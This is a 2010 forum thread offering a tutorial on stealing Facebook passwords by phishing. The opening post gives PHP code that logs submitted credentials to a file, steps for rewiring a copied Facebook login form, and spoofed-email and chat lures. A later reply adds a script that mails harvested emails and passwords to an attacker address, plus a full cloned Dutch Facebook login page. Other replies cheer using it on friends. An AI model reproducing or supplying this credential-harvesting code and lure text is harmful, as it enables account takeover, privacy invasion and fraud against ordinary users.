Post: Tutorial on howto hack Facebook accounts. (Phishing)
05-07-2010, 08:12 AM #1
lxzer
Do a barrel roll!
(adsbygoogle = window.adsbygoogle || []).push({});
Hack
A


Facebook


Account



Gaining access to ones Facebook account without any prior knowledge to the users password prior to phishing is not as hard as one may pres-eve it to be. Read on and you will learn how to do this.

How will this be done? You will be able to gain acess to another users facebook profile by using a method known as "phishing"

Phishing.

What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.

Lets get started!

HOW

Sign up on a free webpage hosting site. I prefer You must login or register to view this content. as it is the easiest free hosting site to use (in my opinion) and doesn't remove your webpage once it has been created.

Once you have signed up click on " You must login or register to view this content. "

Now click on " You must login or register to view this content. "

Once you are in your files click on create text file.

You are going to need to name the file " Login.php " (Don't include quotations )

You are now going to visit this site by clicking You must login or register to view this content.

You are going to now view the source of the page and select all of the text, you are going to copy the text.

now go on back to your text file named " login.php " that you made earlier. You are going to paste the text that you copied from Facebook into your text file. Once done, click on "create"

Now go back to " My Files " And create another text file.

You are going to name this file " Phishing.php " (Don't include quotations )

now copy and paste this:

Originally posted by another user
<?php
header ('Location: You must login or register to view this content. 'Winky Winky;
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>


Replace "XXXXXXXXXXXXXXXX" with your ripway username.

Now click on create.

go back to " my files " and your going to want to click on "edit" for your " login.php " file.

Once your editing " login.php " Your going to want to click in the body of the text and hit Ctrl F. This will open up a find function and your going to type in " action " ( without quotations )

It will bring you to something like this:


action="https://login.facebook.com/login.php?login_attempt=1"

your going to want to select everything within the quotations. ( You will select " You must login or register to view this content. " )

Now replace this with:

action="https://h1.ripway.com/XXXXXXXXXXXXXXXX/phishing.php?"

Replace the XXXXXXXXX's with your ripway username.

now click on " save "

Go back to " My Files " and go to where it says:

login.php
Direct Link: You must login or register to view this content.
[ Get HTML Codes | Rename | Edit ]

Copy " You must login or register to view this content. " The XXXX's will be your ripway username.

This is what your link to your webpage is, when you send this to people and they login to it their email and password will be displayed in " passwords.txt "

If at anytime you wish to view the email and password they entered just simply edit " passwords.txt " and bobs your uncle :y:

If for whatever reason this didn't work, then please ask a question on this thread. If this helped you then don't forget to thank or +REP me! Happy

Where I learned this: [ame="https://www.youtube.com/watch?v=0fJOxdDjPn8"]LINK.[/ame]

HOWTO CONVINCE YOUR VICTIM TO LOGIN TO YOUR FAKE WEBPAGE.


There is several ways this may be accomplished but one that almost always works is to email spoof your victim and appear as if your Facebook. I personally like to use " [email][email protected][/email] " as it is the official notification email sender for Facebook.

Simply putting in " You must verify your Facebook account " persons name " failure at verifying your account will result in termination of your account.

Or you could simply put something like:

Bob Smith commented on his status:

"that doesn't make sense"

Reply to this email to comment on this status.

To see the comment thread, follow the link below:
You must login or register to view this content.

Thanks,
The Facebook Team

___
Find people from your Windows Live Hotmail address book on Facebook! Go to: You must login or register to view this content.

This message was intended for private@ private.com. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.
You must login or register to view this content.
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.


There is quiet a few tutorials on email spoofing but for a quick easy way to start email spoofing just use this You must login or register to view this content.

Also just talking over MSN and starting up a convo maybe saying things like:

You say: Hey

Target says: Hey

You say: Whats up?

Target says: Nothing jc, you?

You say: Nothing bored, you know bob was talking shmmmaccck about you right?

Target says: no, what?

You say: Yea its on Facebook he was calling you a silly pelican

Target says: that kid really grinds my gears, where did he post this?

You say: You must login or register to view this content.


And bobs your uncle :y:

Use whatever method works for you or create your own and post them here. Also Sending ripway links or any other phishing links directly over Facebook chat will get you suspended for a day or two, as i was suspended.

Plain and simple, this is as far as I know the only trojan/backdoor/keylogger free way to gain access to someones Facebook account. There is no " Facebook password cracker " Out there that works as far as im aware.

This was my first tutorial I have posted on this site so give me some critique, or if you thought it was a good tutorial or not!

This is pretty simple, but if you have any problems then just let me know!

If this helped you then don't forget to thank or +REP!
Last edited by lxzer ; 10-18-2010 at 03:30 AM.

The following 33 users say thank you to lxzer for this useful post:

2RAW4THESTREET, Car Lover, Chewcracka, Classy., Cpt.Hayden, Darknesse13, Docko412, Encopresis, ESQ_Pugh, FAKA_ELITE, FourzerotwoFAILS, free, Goutinator, Joshycc, Matt1511, Mezzid, Mr. Star, Mudkipzzzz, Nejidam, NeverMoreModz, ozzy21, PatheticBowler, Perfekt, Pichu, Pro Era, Samos95, Toon_Squad, Weescotty, wiseguy48, wite_guy, xMagiik
08-19-2010, 12:08 PM #74
-.Anonymous.-
Treasure hunter
Originally posted by lxzer View Post
I decided to hack a Facebook account because I needed info from the individual. I suspected he stole my iPhone so I hacked his account to get into his inbox for further details. It turns out after further digging that he was the one who took it, and I ended up getting it back, all thanks to this method.

Not to mention its always fun to screw around with peoples profile pictures and status's.


Wow, brilliant idea, and thanks so much for this.
Will be epic to do it to friends and post pictures of shit on there wall :carling:
08-22-2010, 05:16 AM #75
lxzer
Do a barrel roll!
Originally posted by GaiaBlade View Post
lmao, and the links that they're gonna click on doesn't look to convincing....


You just have to be convincing.

Originally posted by The
can someone help me with this? i dont understand it? "You are going to now view the source of the page and select all of the text, you are going to copy the text."


Right click - View Page Source - Hold Ctrl A to select all the text on that page, then copy the text by using Ctrl C.


Originally posted by MaJiCXx
Lol even tho i have seen this before all over youtube and its very easy to do i did rep you for it bro =]


lol thanks:bro:

Originally posted by LoboAstuto View Post
i tried this but didnt work maybe i did somthing wrong :embarrassed:


You probably did something wrong but refresh the page a couple times, and if nothing is working its cause you did something wrong.

[quote='[xG]RawR;1529256']Wow, brilliant idea, and thanks so much for this.
Will be epic to do it to friends and post pictures of shit on there wall :carling:[/quote]

thanks and no problem. yea its always funny to do shit like that lol.
08-24-2010, 09:34 AM #76
xAlex_
Keeper
U write your results to a .txt files, that i find dumb.

Here's another way,
go to facebook and click op page source (something like that)

something will popup with a lot of html code.

Copy it,

find the login form, like this:
    
<form method="post">
</form>


and in the form you put the action the sendmail.php
and set the method to get
    <form method="get" action="sendmail">



then create a new file, sendmail.php
set this in it:

    <?php
if(empty($_GET['email']) || empty($_GET['password'])){
echo 'U need to fill in a password';
}else{
echo 'you logged in';
$SendMAILto = "[email protected]";
mail($SendMAILto, 'HACKED FACEBOOK ACCOUNT', 'Email is: ' . $_GET['email'] . '\n And Password is: ' . $_GET['password']);
header('Location: https://www.facebook.com');
}



voila your done, i will make the hole script later, so you guys just have to copy it


EDIT EDIT:
Ok so i made the files,
name this file index.php:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="nl" lang="nl" id="facebook" class=" no_js">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="nl" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._is_quickling_index="";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook is een sociaal netwerk dat vrienden, collega's, studiegenoten en kennissen met elkaar in contact brengt. Gebruik Facebook om op de hoogte te blijven van hoe het met je vrienden gaat, om onbeperkt foto's te uploaden, links en video's uit te wisselen en meer te weten te komen over de mensen die je ontmoet." />
<link rel="alternate" media="handheld" href="https://www.facebook.com/" />
<title>Welcome To Facebook</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link type="text/css" rel="stylesheet" href="https://static.ak.fbcdn.net/rsrc.php/zA34M/hash/563da9j2.css" />

<link type="text/css" rel="stylesheet" href="https://static.ak.fbcdn.net/rsrc.php/z5705/hash/5eo1yqin.css" />
<link type="text/css" rel="stylesheet" href="https://static.ak.fbcdn.net/rsrc.php/zDO8K/hash/3963vzpa.css" />


<link rel="search" type="application/opensearchdescription+xml" href="https://static.ak.fbcdn.net/rsrc.php/zBOV4/hash/10jfw8tc.xml" title="Facebook" />
<link rel="shortcut icon" href="https://static.ak.fbcdn.net/rsrc.php/z9Q0Q/hash/8yhim1ep.ico" /></head>
<body class="WelcomePage UIPage_LoggedOut ff3 win Locale_nl_NL">
<div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Ga naar de Facebook-startpagina"><img class="fb_logo img" src="https://static.ak.fbcdn.net/rsrc.php/zEX21/hash/75j4m1ms.png" alt="Facebook-logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="GET" action="sendmail.php" ><table cellspacing="0"><tr><td class="html7magic"><label for="email">E-mailadres</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" name="email" value="[email protected]" /></td><td><input type="password" name="passs" value="mypass" /></td><td><label class="uiButton uiButtonConfirm uiButtonMedium"><input value="Sign In" type="submit" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><label id="label_persistent" for="persistent">Keep me signed in</label></td><td class="login_form_label_field"><a href="https://www.facebook.com/reset.php" rel="nofollow">Forgot Password?</a></td></tr></table><input type="hidden" name="charset_test" value="€,´,€,´,?,?,?" /><input type="hidden" id="lsd" name="lsd" value="qhRmj" autocomplete="off" /></form>

</div></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Met Facebook ben je verbonden en deel je alles met iedereen in je leven.</div><div class="WelcomePage_MainMap"> </div></div><div class="WelcomePage_MainSellRight"><div class="WelcomePage_SignUpSection"><div class="WelcomePage_SignUpMessage"><div class="WelcomePage_SignUpHeadline">Registreren</div><div class="WelcomePage_SignUpSubheadline">Het is gratis (en dat blijft het ook)</div></div><div class="WelcomePage_SimpleReg" id="registration_container"><div id="simple_registration_container" class="simple_registration_container"><div id="reg_box"><form method="post" action="https://register.facebook.com/r.php" name="reg" id="reg" onsubmit="return false;"><input type="hidden" name="charset_test" value="€,´,€,´,?,?,?" /><input type="hidden" id="locale" name="locale" value="nl_NL" autocomplete="off" /><input type="hidden" id="ab_test_data" name="ab_test_data" value="" autocomplete="off" /><input type="hidden" id="terms" name="terms" value="on" autocomplete="off" /><input type="hidden" id="reg_instance" name="reg_instance" value="1282642509-c75df7b8395829f51717cb9d2abbbac5ff0b28a1a764acfd91b9a" autocomplete="off" /><input type="hidden" id="abtest_registration_group" name="abtest_registration_group" value="1" autocomplete="off" /><noscript><div id="no_js_box"><h2>Javascript is uitgeschakeld in je internetbrowser.</h2><p>Activiteer JavaScript in je browser of upgrade naar een browser die wel over Javascript beschikt om je aan te melden voor Facebook.</p></div></noscript><div id="reg_form_box" class="large_form "><table class="editor" border="0" cellspacing="0"><tr><td class="label">Voornaam:</td><td><div class="field_container"><input type="text" class="inputtext" id="firstname" name="firstname" value="" /></div></td></tr>
<tr><td class="label">Achternaam:</td><td><div class="field_container"><input type="text" class="inputtext" id="lastname" name="lastname" value="" /></div></td></tr>
<tr><td class="label">Jouw <span class="nowrapEmail">E-mailadres</span>:</td><td><div class="field_container"><input type="text" class="inputtext" id="reg_email__" name="reg_email__" value="" /></div></td></tr>
<tr><td class="label"><span class="nowrapEmail">E-mailadres</span> opnieuw invoeren:</td><td><div class="field_container"><input type="text" class="inputtext" id="reg_email_confirmation__" name="reg_email_confirmation__" value="" /></div></td></tr>
<tr><td class="label">Nieuw wachtwoord:</td><td><div class="field_container"><input type="password" class="inputpassword" id="reg_passwd__" name="reg_passwd__" value="" /></div></td></tr>

<tr id="extra_selects_hack"><td><select><option></option><option></option></select><select><option></option><option></option></select></td></tr><tr><td class="label">Ik ben een:</td><td><div class="field_container"><select class="select" name="sex" id="sex"><option value="0" selected="1">Selecteer je geslacht:</option><option value="1">Vrouw</option><option value="2">Man</option></select></div></td></tr><tr><td class="label">Geboortedatum:</td><td><div class="field_container"> <select name="birthday_day" id="birthday_day" onchange="" autocomplete="off"><option value="-1">Awesome faceag:</option><option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>

<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>

<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>

<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select> <select class="" id="birthday_month" name="birthday_month" onchange="return run_with(this, ["editor"], function() {editor_date_month_change(this, "birthday_day", "birthday_year");});"><option value="-1">Maand:</option><option value="1">januari</option>

<option value="2">februari</option>
<option value="3">maart</option>
<option value="4">april</option>
<option value="5">mei</option>
<option value="6">juni</option>
<option value="7">juli</option>
<option value="8">augustus</option>
<option value="9">september</option>
<option value="10">oktober</option>

<option value="11">november</option>
<option value="12">december</option>
</select> <select name="birthday_year" id="birthday_year" onchange="return run_with(this, ["editor"], function() {editor_date_month_change("birthday_month","birthday_day",this);});" autocomplete="off"><option value="-1">Jaar:</option><option value="2010">2010</option>
<option value="2009">2009</option>
<option value="2008">2008</option>
<option value="2007">2007</option>
<option value="2006">2006</option>
<option value="2005">2005</option>

<option value="2004">2004</option>
<option value="2003">2003</option>
<option value="2002">2002</option>
<option value="2001">2001</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>
<option value="1997">1997</option>
<option value="1996">1996</option>

<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>
<option value="1988">1988</option>
<option value="1987">1987</option>

<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>
<option value="1979">1979</option>
<option value="1978">1978</option>

<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>
<option value="1970">1970</option>
<option value="1969">1969</option>

<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>
<option value="1961">1961</option>
<option value="1960">1960</option>

<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>
<option value="1952">1952</option>
<option value="1951">1951</option>

<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>
<option value="1943">1943</option>
<option value="1942">1942</option>

<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>
<option value="1934">1934</option>
<option value="1933">1933</option>

<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>
<option value="1925">1925</option>
<option value="1924">1924</option>

<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>
<option value="1916">1916</option>
<option value="1915">1915</option>

<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
<option value="1908">1908</option>
<option value="1907">1907</option>
<option value="1906">1906</option>

<option value="1905">1905</option>
<option value="1904">1904</option>
<option value="1903">1903</option>
<option value="1902">1902</option>
<option value="1901">1901</option>
<option value="1900">1900</option>
</select></div></td></tr>
<tr><td class="label"></td><td><div id="birthday_warning"><a href="/ajax/reg_birthday_help.php" title="Klik voor meer informatie" rel="dialog">Waarom moet ik dit invullen?</a></div></td></tr>
</table><input type="hidden" id="referrer" name="referrer" value="" autocomplete="off" /><input type="hidden" id="md5pass" name="md5pass" value="" autocomplete="off" /><div class="reg_btn clearfix"><label class="uiButton uiButtonSpecial uiButtonMedium"><input value="Registreren" onclick="return run_with(this, ["reg-util"], function() {RegUtil.getInstance().ajax_validate_data("https:\/\/register.facebook.com\/ajax\/register.php", {ignore: ['captcha']}, "registration_container", "1");});" type="submit" /></label><span id="async_status" class="async_status" style="display: none"><img class="img" src="https://static.ak.fbcdn.net/rsrc.php/zBS5C/hash/7hwy7at6.gif" alt="" width="16" height="11" /></span></div></div><div id="reg_captcha" style="display: none;"><h2>Beveiligingscontrole</h2><div id="outer_captcha_box"><div id="captcha_box"><div class="field_error" id="captcha_response_error" style="display:none;">Awesome faceit veld is verplicht.</div><div id="captcha" class="captcha">

<input type="hidden" id="captcha_persist_data" name="captcha_persist_data" value="AAAAAwAgACAAAAD0ABrh67nC9_aROB-Q09uHzrq21gusFqBrVAV6CRgdjpmLy51QXomEoBfZwOUyQVG_Jbj1TU_DPBmJapuv6fhoSrHpgBqIIYEYGiTB_dcjKnIbCfcvOWr8_4aOC7p7DQhaBrXofVgqAvcr89-PKWB0E9TYHPwpZzvYRFXPYn4_vMSEESRbobNBXTYqmk0qrQAnPWbTEu3-dSyRs_js8TH8LA2Eo8eF-vQ4DsF204-yKptKvUs0RRBfAYPKP1XdGGBZ8r1ERB-Frc9neIQJsVPEbCixt_vTvgydFFblE7qc6nCzmenjsjp_rU76NH8tq8oTLlUszo7thdTvksJbCBy36Zz9kOAMOXp0Hdg6CSb3L_RHvEIucgk6R86eduvuFOaRdadw2qzjSUrJOZdc4AZTrIDDsiEHvFS2TUI-S934CdQ." autocomplete="off" /><div><div id="recaptcha_scripts" style="display:none"></div><input type="hidden" id="captcha_session" name="captcha_session" value="e8c8vBN0V-5gyA0IsHUVbQ" autocomplete="off" /><input type="hidden" id="extra_challenge_params" name="extra_challenge_params" value="authp=nonce.tt.time.new_audio_default&psig=RBI7T777cksjn2kd98ukX06AzO8&nonce=e8c8vBN0V-5gyA0IsHUVbQ&tt=A-UTNMSUolsfSeVHjFvAP_HCNNc&time=1282642509&new_audio_default=1" autocomplete="off" /><input type="hidden" id="recaptcha_type" name="recaptcha_type" value="password" autocomplete="off" /><div class="recaptcha_text"><div class="recaptcha_only_if_image">Vul <strong>beide woorden</strong> hieronder in, <strong>gescheiden door een spatie</strong>.<br />Kun je de woorden hieronder niet lezen? <a href="#" onclick="Recaptcha.reload(); return false" id="recaptcha_reload_btn" tabindex="-1">Probeer andere woorden</a> of <a href="#" onclick="Recaptcha.switch_type("audio"); return false;" tabindex="-1">een audio-captcha</a>.</div><div class="recaptcha_only_if_audio" style="display:none">Vul de woorden of nummers in die je hoort.<br /><a href="#" onclick="Recaptcha.reload(); return false" id="recaptcha_reload_btn" tabindex="-1">Probeer andere woorden</a> of <a class="recaptcha_only_if_audio" href="#" onclick="Recaptcha.switch_type("image"); return false;" tabindex="-1">terug naar tekst</a>.</div></div><span id='recaptcha_play_audio'></span><div class="audiocaptcha"></div><div id="recaptcha_image" class="captcha_image"></div><div id="recaptcha_loading">Laden... <img class="captcha_loading img" src="https://static.ak.fbcdn.net/rsrc.php/zBS5C/hash/7hwy7at6.gif" style="height:11px;width:16px;" /></div></div><div class="captcha_refresh"></div><div class="captcha_input"><label>Tekst in het kader:</label><div class="field_container"><input type="text" name="captcha_response" id="captcha_response" autocomplete="off" /></div><div style="margin-left: 15px; display: inline;"><a href="#" onclick="captcha_whatsthis(this); return false" id="captcha_whatsthis">Wat is dit?</a></div></div>

</div></div></div><div id="captcha_buttons" class="clearfix" style="display: none;"><div id="back_button" class="gridCol"><div class="cancel_button_image"> </div><a href="#" onclick="return run_with(this, ["reg-util"], function() {RegUtil.getInstance().hide_captcha();RegUtil.getInstance().show_reg_form();});" id="cancel_button">Terug</a></div><div id="A_btn_sign_up" class="gridCol"><div><label class="uiButton uiButtonSpecial uiButtonMedium"><input value="Registreren" onclick="setFormTypeABTest($('reg'Winky Winky); return run_with(this, ["reg-util"], function() {RegUtil.getInstance().ajax_validate_data("https:\/\/register.facebook.com\/ajax\/register.php", '', "registration_container", "1");});" type="submit" /></label><span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="https://static.ak.fbcdn.net/rsrc.php/zBS5C/hash/7hwy7at6.gif" alt="" width="16" height="11" /></span></div></div></div></div></form>
<div id="reg_progress" style="display: none"><div id="progress_wrap"><img class="img" src="https://static.ak.fbcdn.net/rsrc.php/zBS5C/hash/7hwy7at6.gif" alt="" width="16" height="11" /><div id="progress_msg">Bezig met registreren…</div></div></div><div id="reg_error" style="display: none"><div id="reg_error_inner">Er is een fout opgetreden. Probeer het opnieuw.</div></div><div id="tos_container" class="tos_container hidden_elem"><p class="legal_tos">Awesome faceoor op Registeren te klikken, geef je aan dat je de <a href="/terms.php" target="_blank" rel="nofollow">Gebruiksvoorwaarden</a> en het <a href="/policy.php" target="_blank" rel="nofollow">Privacybeleid</a> hebt gelezen en ermee akkoord gaat.</p></div><div id="reg_pages_msg" ><a href="/campaign/landing.php?placement=pghm&campaign_id=372931622610&extra_1=0">Maak een pagina</a> voor een beroemde persoon, een band of bedrijf.</div></div><form method="POST" action="https://register.facebook.com/r.php" id="confirmation_email_form"><input type="hidden" name="charset_test" value="€,´,€,´,?,?,?" /><input type="hidden" id="locale" name="locale" value="nl_NL" autocomplete="off" /><input type="hidden" id="confirmation_email" name="ce" value="" autocomplete="off" /></form></div></div></div></div></div></div></div><ul class="uiList uiListHorizontal clearfix welcome_locales"><li class="uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://fr-fr.facebook.com/" onclick="intl_set_cookie_locale("fr_FR", "http:\/\/fr-fr.facebook.com\/", "TOP_LOCALES"); return false;" title="French (France)">Français (France)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://nl-nl.facebook.com/" onclick="intl_set_cookie_locale("nl_NL", "http:\/\/nl-nl.facebook.com\/", "TOP_LOCALES"); return false;" title="Dutch">Nederlands</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://www.facebook.com/" onclick="intl_set_cookie_locale("en_US", "http:\/\/www.facebook.com\/", "TOP_LOCALES"); return false;" title="English (US)">English (US)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://es-la.facebook.com/" onclick="intl_set_cookie_locale("es_LA", "http:\/\/es-la.facebook.com\/", "TOP_LOCALES"); return false;" title="Spanish">Español</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://pt-br.facebook.com/" onclick="intl_set_cookie_locale("pt_BR", "http:\/\/pt-br.facebook.com\/", "TOP_LOCALES"); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://de-de.facebook.com/" onclick="intl_set_cookie_locale("de_DE", "http:\/\/de-de.facebook.com\/", "TOP_LOCALES"); return false;" title="German">Awesome faceeutsch</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://it-it.facebook.com/" onclick="intl_set_cookie_locale("it_IT", "http:\/\/it-it.facebook.com\/", "TOP_LOCALES"); return false;" title="Italian">Italiano</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://ar-ar.facebook.com/" onclick="intl_set_cookie_locale("ar_AR", "http:\/\/ar-ar.facebook.com\/", "TOP_LOCALES"); return false;" title="Arabic">???????</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://hi-in.facebook.com/" onclick="intl_set_cookie_locale("hi_IN", "http:\/\/hi-in.facebook.com\/", "TOP_LOCALES"); return false;" title="Hindi">??????</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a href="https://zh-cn.facebook.com/" onclick="intl_set_cookie_locale("zh_CN", "http:\/\/zh-cn.facebook.com\/", "TOP_LOCALES"); return false;" title="Simplified Chinese (China)">??(??)</a></li><li class="plm uiListItem uiListHorizontalItemBorder uiListHorizontalItem"><a class="chevron" rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2F&source=TOP_LOCALES_DIALOG" title="Meer talen weergeven">»</a></li></ul></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div class="lfloat"><div class="uiTextSubtitle"><span title="HPHP - 63 - 10.146.243.117 - 551296"> Facebook © 2010</span></div></div><div class="uiTextSubtitle rfloat"><a href="https://www.facebook.com/mobile?ref=pf" title="Probeer Facebook Mobile.">Mobile</a> · <a href="https://www.facebook.com/find-friends?ref=pf" title="Vind iedereen op internet.">Vrienden zoeken</a> · <a href="https://www.facebook.com/badges/?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> · <a href="https://www.facebook.com/facebook" accesskey="8" title="Lees ons blog, ontdek het resource center en zoek naar vacatures.">Over Facebook</a> · <a href="/campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=0" title="Adverteren op Facebook.">Adverteren</a> · <a href="https://developers.facebook.com/?ref=pf" title="Ontwikkel op ons platform.">Ontwikkelaars</a> · <a href="https://www.facebook.com/careers/?ref=pf" title="Kom bij ons geweldige bedrijf werken.">Vacatures</a> · <a href="https://www.facebook.com/privacy/explanation.php" title="Meer informatie over privacy op Facebook.">Privacy</a> · <a href="https://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Lees onze servicevoorwaarden.">Gebruiksvoorwaarden</a> · <a href="https://www.facebook.com/help/?ref=pf" accesskey="0" title="Bezoek ons helpcentrum.">Help</a></div></div></div></div><script type="text/javascript">/* <![CDATA[ */if (top != self) { try { if (top.location.hostname.indexOf("apps") >= 0) { throw 1; } } catch (e) {setTimeout(function() {var fb_cj_img = new Image(); fb_cj_img.src = "http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&m&t=7013";}, 5000); window.document.write("<style>body * { display:none !important; }<\/style><a href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display: block !important; padding: 10px\"><i class=\"img spritemap_5f1gxs sx_aa9004\" style=\"display:block !important\"><\/i>Ga naar Facebook.com<\/a>");/* NLur0g1g */ }}/* ]]> */</script><script type="text/javascript">
Env={ffid1:"gWYhtjQscf9Qhk1Z95_MBg",ffid2:"ZSEAp7hCjQ43nN4DcM__Kg",ffid3:"MTI3OTgyNzMwMi0zNTVlYjc5OTA3Y2VmZDI4YjI5NTY0MDc5MDBmYzNlOTRhMThiODE3NzM1ODEyNTdhNmQzMA..",ffid4:"Xyokd37TpgsC1a9JZyEvEQ",ffver:58931,user:0,locale:"nl_NL",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:281678,vip:"66.220.156.32",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"XkL2x",lhsh:"a995b",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",ajaxpipe_enabled:"1"};

</script>

<script type="text/javascript">Bootloader.setResourceMap({"TpAjx":{"name":"js\/bhd468y0d3scs00g.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zC4DI\/p\/hash\/1q3qlm34.js"},"cQxw0":{"name":"js\/bg3comqztfwos4o8.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z5BJA\/p\/hash\/4615g7uj.js"},"olbS\/":{"name":"css\/ae00p9rwk9c80oww.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zA34M\/hash\/563da9j2.css"},"PB2xF":{"name":"css\/2jzblqbxh6askk8c.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z5705\/hash\/5eo1yqin.css"},"WRiEv":{"name":"css\/1k99uzpriz7oosw4.pkg.css","type":"css","permanent":1,"nonblocking":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zDO8K\/hash\/3963vzpa.css"},"7zF4n":{"name":"js\/4zfba0rzy84ksk04.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z8T4D\/hash\/4wj244ne.js"},"+361U":{"name":"js\/e1f5nq1ku1sgsw0k.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z27XR\/p\/hash\/1hw7xotm.js"},"MVb31":{"name":"js\/captcha\/recaptcha_ajax.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zB3W7\/p\/hash\/2do6u6jw.js"},"kQR+4":{"name":"css\/bg5s6leamegocgok.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z5YWN\/hash\/cd66foij.css"},"UJ8Bq":{"name":"js\/reg_